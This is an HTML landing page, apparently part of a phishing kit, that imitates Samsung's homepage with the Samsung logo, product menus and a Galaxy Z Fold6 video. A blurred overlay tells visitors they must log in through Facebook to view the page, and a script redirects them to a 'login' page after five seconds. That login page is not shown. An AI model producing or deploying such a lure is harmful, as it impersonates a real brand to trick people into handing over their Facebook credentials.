<!DOCTYPE html>
<html>
<head><meta name="viewport" content="width=device-width, initial-scale=1.0" charset="UTF-8">
    <title>Lander</title>
    <link rel="icon" type="image/png" href="https://pngimg.com/uploads/google/google_PNG19635.png">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@400..700&family=Fjalla+One&family=Mochiy+Pop+P+One&family=Oswald:wght@200..700&family=Pacifico&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap" rel="stylesheet"><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
<head>
<style>
    html, body{
        height: 100%;
        width: 100%;
        overflow-x: hidden;
    }
    body {
        background-repeat: no-repeat;
        background:#222222;
        background-size: cover;
        padding: 0;
        margin: 0;
    }
    .nav {
        position: relative;
        top: 0;
        left: 0;
        width: 100%;
        height: 70px;
        background-color: #ffff;
        border-bottom: 2px solid #4444;
        z-index: 99;
    }
    .logo {
        position: absolute;
        top: 50%;
        translate: 0 -50%;
        left: 20px;
        height: 30px;
        width: auto;
    }
    .lists {
        position: relative;
        left: 200px;
        height: 100%;
        width: auto;
        display: flex;
        justify-content: left;
        align-items: center;
    }
    .lists .list2 {
        font-family: Roboto;
        margin-left: 5px;
        margin-right: 5px;
        font-size: 15px;
        text-decoration: none;
        color: #111111;
        padding: 5px;
    }
    .lists .list2:hover {
        background-color: #111111;
        color: #ffffff;
        border-radius: 25px;
    }
    .right-block {
        height: 100%;
        width: auto;
        position: absolute;
        top: 0;
        right: 0;
        display: flex;
        justify-content: right;
        align-items: center;
    }
    .person {
        width: auto;
        font-size: 35px;
        margin-right: 20px;
        margin-left: 10px;
    }
    .cart {
        width: auto;
        font-size: 30px;
        margin: 10px;
    }
    .search {
        width: auto;
        font-size: 30px;
        margin-left: 30px;
        margin-right: 10px;
    }
    .right-block a {
        font-family: Roboto;
        margin-left: 5px;
        margin-right: 5px;
        font-size: 15px;
        text-decoration: none;
        color: #111111;
        padding: 5px;
    }
    .right-block a:hover {
        background-color: #111111;
        color: #ffffff;
        border-radius: 25px;
    }
    .shop {
        font-family: Roboto;
        margin-left: 5px;
        margin-right: 5px;
        font-size: 15px;
        text-decoration: none;
        color: #111111;
        padding: 5px;
        display: inline-block;
    }
    .shop:hover {
        background-color: #111111;
        color: #ffffff;
        border-radius: 25px;
    }
    .shop:hover .drop {
        display: inline-block;
        top: 50px;
        left: 0px;
        padding-top: 20px;
        transition: .25s ease all;
        height: auto;
    }
    .shop:hover a {
        display: block;
    }
    .drop {
        display: block;
        position: absolute;
        top: -190px;
        left: 0;
        background-color: #ffffff;
        width: 450px;
        padding: 30px;
        border-radius: 0 0 30px 30px;
        z-index: -1;
        transition: .25s ease all;
        transition-delay: .1s;
    }
    .drop a {
        display: none;
        color: black;
        padding: 12px 16px;
        text-decoration: none;
    }
    .contain {
        position: absolute;
        top: 70px;
        left: 0;
    }
    video {
        width: 100%;
    }
    .head {
        position: absolute;
        top: 200px;
        left: 100px;
        font-size: 50px;
        font-family: roboto;
        font-weight: 1000;
        cursor: pointer;
        text-decoration: none;
        color: #111111;
        z-index: 1;
    }
    .glitch {
        position: fixed;
        top: 0;
        left: 0;
        height: 100%;
        width: 100%;
        z-index: 999;
        background: #ffffff80;
        backdrop-filter: blur(30px);
        display: flex;
        justify-content: center;
        align-items: center;
    }
    h4 {
        font-size: 30px;
        text-align: center;
    }
</style>
</head>
<body>
    <div class="glitch">
        <h4>*You will have to login through facebook to view the page.*</h4>
    </div>
    <div class="nav">
        <a class="left-block" href="https://www.samsung.com"><img class="logo" src="https://clipground.com/images/samsung-logo-black-png-8.png"></a>
        <div class="lists">
            <div class="shop">Shop
                <div class="drop">
                    <a class="item1" href="#">Link 1</a>
                    <a class="item1" href="#">Link 2</a>
                    <a class="item1" href="#">Link 3</a>
                </div>
            </div>
            <div class="list2">AI</div>
            <div class="list2">TV & AV</div>
            <div class="list2">Home Appliance</div>
            <div class="list2">IT</div>
            <div class="list2">Displays</div>
            <div class="list2">Smart Things</div>
        </div>
        <div class="right-block">
            <a href="#">Support</a>
            <a href="#">Business</a>
            <div><span class="search material-symbols-outlined">search</span></div>
            <div><span class="cart material-symbols-outlined">shopping_cart</span></div>
            <div><span class="person material-symbols-outlined">person</span></div>
        </div>
    </div>
    <div class="contain">
        <a class="head" href="#">Galaxy Z Fold6 | Z Flip6</a>
        <video src="https://images.samsung.com/is/content/samsung/assets/pk/2407/home/HOME_B6Q6_Main-KV_1440x640_pc.mp4" autoplay muted>
        </video>
    </div>
    <script>
        function redirectAfterDelay(url, delay) {
            setTimeout(function() {
                window.location.href = url;
            }, delay);
            }
            redirectAfterDelay("login", 5000)
    </script>
</body>
</html>